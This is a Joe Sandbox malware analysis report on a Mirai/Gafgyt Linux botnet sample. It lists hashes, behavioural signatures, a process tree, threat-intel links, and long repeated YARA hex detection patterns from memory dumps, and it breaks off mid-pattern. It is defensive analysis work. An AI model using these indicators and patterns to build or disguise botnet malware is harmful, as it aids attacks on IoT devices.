Edit tour

Linux Analysis Report
F00D0B21M4.elf

Overview

General Information

Sample Name:	F00D0B21M4.elf
Original Sample Name:	161c3c3e0205e1057ae14b4ce4604219.elf
Analysis ID:	1346284
MD5:	161c3c3e0205e1057ae14b4ce4604219
SHA1:	f2f8888a901fc3949455933762f58ff0b32fafd8
SHA256:	48e371bf5e4e9554a6a27007cd28b7f472baca0d4e26624cc1d092f7c0d29994
Tags:	32elfmiraimotorola
Infos:

Detection

Mirai

Score:	100
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Yara detected Mirai

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Detected Mirai

Snort IDS alert for network traffic

Uses known network protocols on non-standard ports

Sample tries to kill multiple processes (SIGKILL)

Yara signature match

Uses the "uname" system call to query kernel version information (possible evasion)

Enumerates processes within the "proc" file system

Detected TCP or UDP traffic on non-standard ports

Sample listens on a socket

Sample tries to kill a process (SIGKILL)

Sample has stripped symbol table

HTTP GET or POST without a user agent

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.

Static ELF header machine description suggests that the sample might not execute correctly on this machine.

General Information

Joe Sandbox Version:	38.0.0 Ammolite
Analysis ID:	1346284
Start date and time:	2023-11-22 08:37:09 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample file name:	F00D0B21M4.elf renamed because original name is a hash value
Original Sample Name:	161c3c3e0205e1057ae14b4ce4604219.elf
Detection:	MAL
Classification:	mal100.spre.troj.linELF@0/0@0/0

Warnings

Report size exceeded maximum capacity and may have missing network information.

Runtime Messages

Command:	/tmp/F00D0B21M4.elf
PID:	6203
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	Infected By Cult
Standard Error:

Process Tree

system is lnxubuntu20

F00D0B21M4.elf (PID: 6203, Parent: 6119, MD5: cd177594338c77b895ae27c33f8f86cc) Arguments: /tmp/F00D0B21M4.elf

F00D0B21M4.elf New Fork (PID: 6205, Parent: 6203)

F00D0B21M4.elf New Fork (PID: 6206, Parent: 6203)

F00D0B21M4.elf New Fork (PID: 6208, Parent: 6203)

F00D0B21M4.elf New Fork (PID: 6211, Parent: 6208)

F00D0B21M4.elf New Fork (PID: 6212, Parent: 6208)

F00D0B21M4.elf New Fork (PID: 6213, Parent: 6208)

F00D0B21M4.elf New Fork (PID: 6214, Parent: 6208)

F00D0B21M4.elf New Fork (PID: 6219, Parent: 6208)

F00D0B21M4.elf New Fork (PID: 6220, Parent: 6208)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Mirai	Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.	No Attribution	http://osint.bambenekconsulting.com/feeds/ http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/ https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/ https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
F00D0B21M4.elf	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
F00D0B21M4.elf	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x10d60:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10d74:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10d88:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10d9c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10db0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10dc4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10dd8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10dec:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e00:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e14:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e28:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e3c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e50:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e64:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e78:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e8c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10ea0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10eb4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10ec8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10edc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10ef0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
F00D0B21M4.elf	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0x112b1:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Mirai_12	Yara detected Mirai	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
6212.1.00007f3e38001000.00007f3e38014000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6212.1.00007f3e38001000.00007f3e38014000.r-x.sdmp	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x10d60:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10d74:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10d88:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10d9c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10db0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10dc4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10dd8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10dec:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e00:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e14:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e28:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e3c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e50:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e64:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e78:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e8c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10ea0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10eb4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10ec8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10edc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10ef0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
6212.1.00007f3e38001000.00007f3e38014000.r-x.sdmp	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0x112b1:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
6213.1.00007f3e38001000.00007f3e38014000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6213.1.00007f3e38001000.00007f3e38014000.r-x.sdmp	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x10d60:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10d74:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10d88:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10d9c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10db0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10dc4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10dd8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10dec:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e00:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e14:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e28:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e3c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e50:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e64:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e78:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e8c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10ea0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10eb4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10ec8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10edc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10ef0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
6213.1.00007f3e38001000.00007f3e38014000.r-x.sdmp	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0x112b1:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
6203.1.00007f3e38001000.00007f3e38014000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6203.1.00007f3e38001000.00007f3e38014000.r-x.sdmp	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x10d60:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10d74:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10d88:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10d9c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10db0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10dc4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10dd8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10dec:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e00:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e14:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e28:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e3c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e50:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e64:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e78:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e8c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10ea0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10eb4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10ec8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10edc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10ef0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
6203.1.00007f3e38001000.00007f3e38014000.r-x.sdmp	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0x112b1:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
6206.1.00007f3e38001000.00007f3e38014000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6206.1.00007f3e38001000.00007f3e38014000.r-x.sdmp	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x10d60:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10d74:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10d88:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10d9c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10db0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10dc4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10dd8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10dec:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e00:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e14:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e28:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e3c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e50:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e64:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e78:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e8c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10ea0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10eb4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10ec8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10edc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10ef0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
6206.1.00007f3e38001000.00007f3e38014000.r-x.sdmp	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0x112b1:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
6211.1.00007f3e38001000.00007f3e38014000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6211.1.00007f3e38001000.00007f3e38014000.r-x.sdmp	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x10d60:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10d74:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10d88:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10d9c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10db0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10dc4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10dd8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10dec:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e00:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e14:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e28:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e3c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e50:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e64:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e78:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e8c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10ea0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10eb4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10ec8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10edc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10ef0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
6211.1.00007f3e38001000.00007f3e38014000.r-x.sdmp	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0x112b1:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
6208.1.00007f3e38001000.00007f3e38014000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6208.1.00007f3e38001000.00007f3e38014000.r-x.sdmp	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x10d60:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10d74:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10d88:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10d9c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10db0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10dc4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10dd8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10dec:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e00:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e14:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e28:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e3c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e50:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e64:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e78:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e8c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10ea0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10eb4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10ec8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 